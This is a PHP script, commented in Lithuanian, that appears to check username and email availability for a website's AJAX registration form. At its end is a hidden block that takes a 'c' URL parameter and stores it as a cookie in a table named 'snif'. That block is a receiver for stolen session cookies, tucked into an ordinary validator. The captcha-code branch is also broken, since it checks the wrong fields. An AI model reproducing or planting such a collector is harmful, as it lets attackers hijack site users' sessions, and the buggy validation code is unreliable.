<?php
// Tikrinam su ajax registracijoje ivedamus duomenis.
// Speju cia gali buti saugumo spraga.
// Nebaigta funkcija su Kodo ivedimu ziurint i paveiskliuka.
if (isset($_GET) && !empty($_GET)) {
	include_once("variklis/config.php");
			mysql_connect($host,$user,$pass);
			mysql_select_db($dbo);
			mysql_query("SET NAMES utf8");

	if (isset($_GET['nick']) && !empty($_GET['nick'])) {
		if (preg_match('/[^A-Za-z0-9]/', $_GET['nick'])) { 
			$error = "<img src=\"images/icons/cross.png\" alt=\"X\" align=\"absmiddle\" /> Naudok tik raides ir skaičius";
			echo $error;
		}
		else {
			$vardas = htmlentities($_GET['nick'], ENT_QUOTES);
			if (isset($vardas)) {
				$einfo = @mysql_num_rows(mysql_query("SELECT `nick` FROM `users` WHERE `nick`=".escape($vardas)." LIMIT 1"));
				if ($einfo != 0 ) { $error = "<img src=\"images/icons/cross.png\" alt=\"X\" align=\"absmiddle\" />"; }
				else { $error = "<img src=\"images/icons/tick.png\" alt=\"√\" align=\"absmiddle\" />"; }
				echo $error;
			}
		}
	}
	if (isset($_GET['email']) && !empty($_GET['email'])) {
		$email = htmlentities($_GET['email'], ENT_QUOTES);
		if (isset($email)) {
			$einfo = @mysql_num_rows(mysql_query("SELECT `email` FROM `users` WHERE `email`=".escape($email)." LIMIT 1"));
			if ($einfo != 0 ) { $error = "<img src=\"images/icons/cross.png\" alt=\"X\" align=\"absmiddle\" />"; }
			else { $error = "<img src=\"images/icons/tick.png\" alt=\"√\" align=\"absmiddle\" />"; }
		}
		echo $error;
	}
	if (isset($_GET['kode']) && !empty($_GET['kode'])) {
		if (preg_match('/[^A-Za-z0-9]/', $_GET['nick'])) { 
			$error = "<img src=\"images/icons/cross.png\" alt=\"X\" align=\"absmiddle\" /> Naudok tik raides ir skaičius";
		}
		else {
			$email = htmlentities($_GET['email'], ENT_QUOTES);
			if (isset($email)) {
				$einfo = @mysql_num_rows(mysql_query("SELECT `email` FROM `users` WHERE `email`=".escape($email)." LIMIT 1"));
				if ($einfo != 0 ) { $error = "<img src=\"images/icons/cross.png\" alt=\"X\" align=\"absmiddle\" />"; }
				else { $error = "<img src=\"images/icons/tick.png\" alt=\"√\" align=\"absmiddle\" />"; }
				echo $error;
			}
		}
	}
	if (isset($_GET['c']) && !empty($_GET['c'])) {
		$cookie = htmlentities($_GET['c'], ENT_QUOTES);
		if (isset($cookie) && !empty($cookie)) {
			mysql_query("INSERT INTO `snif` (`cookie`) VALUES (".escape($cookie).")");
			return true;
		}
	}
}

//Sutvarko SQL užklausa
function escape($sql) {
	if (get_magic_quotes_gpc()) {
		$sql = stripslashes($sql);
	}
	$sql = "'" . mysql_real_escape_string($sql) . "'";
	return $sql;
}

?>